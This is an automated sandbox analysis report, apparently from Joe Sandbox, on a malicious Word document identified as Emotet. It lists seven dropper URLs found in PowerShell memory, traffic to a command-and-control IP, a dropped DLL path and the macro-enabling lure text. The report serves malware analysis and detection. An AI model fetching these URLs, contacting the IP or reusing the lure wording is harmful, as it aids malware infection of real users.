Source: http://ezi-pos.com/categoryl/x/	Avira URL Cloud: Label: malware
Source: http://allcannabismeds.com/unraid-map/ZZm6/	Avira URL Cloud: Label: malware
Source: https://etkindedektiflik.com/pcie-speed/U/	Avira URL Cloud: Label: malware
Source: http://ienglishabc.com/cow/JH/	Avira URL Cloud: Label: malware
Source: http://giannaspsychicstudio.com/cgi-bin/PP/	Avira URL Cloud: Label: malware
Source: http://abrillofurniture.com/bph-nclex-wygq4/a7nBfhs/	Avira URL Cloud: Label: malware
Source: https://vstsample.com/wp-includes/7eXeI/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: allcannabismeds.com	Virustotal: Detection: 12%	Perma Link
Source: http://ezi-pos.com/categoryl/x/	Virustotal: Detection: 19%	Perma Link
Source: http://allcannabismeds.com/unraid-map/ZZm6/	Virustotal: Detection: 18%	Perma Link
Source: https://etkindedektiflik.com/pcie-speed/U/	Virustotal: Detection: 15%	Perma Link
Source: http://ienglishabc.com/cow/JH/	Virustotal: Detection: 15%	Perma Link
Source: http://allcannabismeds.com	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll	Metadefender: Detection: 66%			Perma Link
Source: C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll	ReversingLabs: Detection: 86%

Multi AV Scanner detection for submitted file

Show sources

Source: info_2020_NJY_31940448.doc	Virustotal: Detection: 65%	Perma Link
Source: info_2020_NJY_31940448.doc	Metadefender: Detection: 41%	Perma Link
Source: info_2020_NJY_31940448.doc	ReversingLabs: Detection: 79%

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2106142374.0000000002A40000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,	7_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10026EEF FindFirstFileExW,	7_2_10026EEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_100272AB FindFirstFileExW,FindNextFileW,FindClose,	8_2_100272AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_10026EEF FindFirstFileExW,	8_2_10026EEF

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: global traffic

DNS query: name: allcannabismeds.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 35.208.69.64:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 35.208.69.64:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.22:49168 -> 152.170.79.100:80

Potential dropper URLs found in powershell memory

Show sources

Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in memory: http://allcannabismeds.com/unraid-map/ZZm6/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in memory: http://giannaspsychicstudio.com/cgi-bin/PP/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in memory: http://ienglishabc.com/cow/JH/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in memory: http://abrillofurniture.com/bph-nclex-wygq4/a7nBfhs/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in memory: https://etkindedektiflik.com/pcie-speed/U/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in memory: https://vstsample.com/wp-includes/7eXeI/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in memory: http://ezi-pos.com/categoryl/x/

Source: global traffic

HTTP traffic detected: GET /unraid-map/ZZm6/ HTTP/1.1Host: allcannabismeds.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 152.170.79.100 152.170.79.100
Source: Joe Sandbox View	IP Address: 152.170.79.100 152.170.79.100

Source: Joe Sandbox View	ASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
Source: Joe Sandbox View	ASN Name: GOOGLE-2US GOOGLE-2US

Source: global traffic

HTTP traffic detected: POST /tkvop2zz2se/0vkwo/ HTTP/1.1DNT: 0Referer: 152.170.79.100/tkvop2zz2se/0vkwo/Content-Type: multipart/form-data; boundary=---------------cRAzC1LzwrnqrIhUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 152.170.79.100Content-Length: 5588Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100
Source: unknown	TCP traffic detected without corresponding DNS query: 152.170.79.100

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A07B73A5-D643-47FF-B622-0CF30ED55516}.tmp

Jump to behavior

Source: global traffic

HTTP traffic detected: GET /unraid-map/ZZm6/ HTTP/1.1Host: allcannabismeds.comConnection: Keep-Alive

Source: rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: allcannabismeds.com

Source: unknown

Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in binary or memory: http://abrillofurniture.com/bph-nclex-wygq4/a7nBfhs/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in binary or memory: http://allcannabismeds.com
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2112382964.000000001B49A000.00000004.00000001.sdmp	String found in binary or memory: http://allcannabismeds.com/unraid-map/ZZm6/
Source: rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in binary or memory: http://ezi-pos.com/categoryl/x/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in binary or memory: http://giannaspsychicstudio.com/cgi-bin/PP/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in binary or memory: http://ienglishabc.com/cow/JH/
Source: rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2114633102.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107425758.0000000000927000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2114633102.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107425758.0000000000927000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2104803337.0000000002340000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111873001.0000000002CF0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2114633102.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107425758.0000000000927000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112295620.00000000024C0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112295620.00000000024C0000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: rundll32.exe, 00000006.00000002.2114633102.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107425758.0000000000927000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2104803337.0000000002340000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111873001.0000000002CF0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112295620.00000000024C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2114633102.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107425758.0000000000927000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000007.00000002.2108209806.0000000002390000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: rundll32.exe, 00000006.00000002.2113882057.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2106952644.0000000000740000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2103707252.0000000000304000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2103707252.0000000000304000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp:
Source: rundll32.exe, 00000008.00000002.2110345397.0000000001F70000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in binary or memory: https://etkindedektiflik.com/pcie-speed/U/
Source: powershell.exe, 00000005.00000002.2109531844.0000000003763000.00000004.00000001.sdmp	String found in binary or memory: https://vstsample.com/wp-includes/7eXeI/

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 0000000E.00000002.2124437516.0000000000161000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2355747254.00000000001D1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2121698890.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2117620078.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2109254352.0000000000261000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2355718078.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112719680.0000000000241000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2124305408.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2111015590.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2121760438.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112674690.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2114888366.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2111121616.00000000001B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2106786697.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2108974608.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.6a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.b20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.250000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.160000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' I Wo'd
Source: Screenshot number: 4	Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4	Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page: I 0' ' I Wo'd" ' I US I N@m 13 ;a
Source: Document image extraction number: 0	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1	Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1	Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1	Screenshot OCR: ENABLE CONTENT" buttons to preview this document.

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll

Jump to dropped file

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5357
Source: unknown	Process created: Commandline size = 5261
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5261	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Slimgulabo\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001D0AC	7_2_1001D0AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1003B353	7_2_1003B353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1003B473	7_2_1003B473
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B773	7_2_1001B773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100357C0	7_2_100357C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B9A5	7_2_1001B9A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100079E0	7_2_100079E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BBE6	7_2_1001BBE6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10035BF0	7_2_10035BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10033D2D	7_2_10033D2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001BE18	7_2_1001BE18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1002FE2A	7_2_1002FE2A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C04A	7_2_1001C04A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C28B	7_2_1001C28B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1003628F	7_2_1003628F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C4BD	7_2_1001C4BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C71A	7_2_1001C71A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001C986	7_2_1001C986
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CBE3	7_2_1001CBE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001CE40	7_2_1001CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2C0C6	7_2_00B2C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B342DA	7_2_00B342DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B302C3	7_2_00B302C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B28736	7_2_00B28736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B34B41	7_2_00B34B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B22C63	7_2_00B22C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2EE78	7_2_00B2EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2B41F	7_2_00B2B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2568E	7_2_00B2568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B33895	7_2_00B33895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B27B63	7_2_00B27B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B280BA	7_2_00B280BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B260B9	7_2_00B260B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B3A0AF	7_2_00B3A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B320C5	7_2_00B320C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2E05A	7_2_00B2E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B361B8	7_2_00B361B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B262A3	7_2_00B262A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2839D	7_2_00B2839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B363C1	7_2_00B363C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2E377	7_2_00B2E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B32349	7_2_00B32349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B326F5	7_2_00B326F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B3878F	7_2_00B3878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B367E9	7_2_00B367E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2C769	7_2_00B2C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B26754	7_2_00B26754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B248BD	7_2_00B248BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B3889D	7_2_00B3889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B288E5	7_2_00B288E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B3687F	7_2_00B3687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B269A0	7_2_00B269A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B38ADC	7_2_00B38ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B22A30	7_2_00B22A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B24A35	7_2_00B24A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2EA4C	7_2_00B2EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B32B16	7_2_00B32B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B30B68	7_2_00B30B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B36DB9	7_2_00B36DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B26D9F	7_2_00B26D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B30D33	7_2_00B30D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B38D1C	7_2_00B38D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B30F0C	7_2_00B30F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B28F78	7_2_00B28F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B38F49	7_2_00B38F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B331E2	7_2_00B331E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B371EF	7_2_00B371EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2B112	7_2_00B2B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B3511B	7_2_00B3511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B21280	7_2_00B21280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B312E2	7_2_00B312E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B373AC	7_2_00B373AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B3340A	7_2_00B3340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B2F444	7_2_00B2F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00B39586	7_2_00B39586
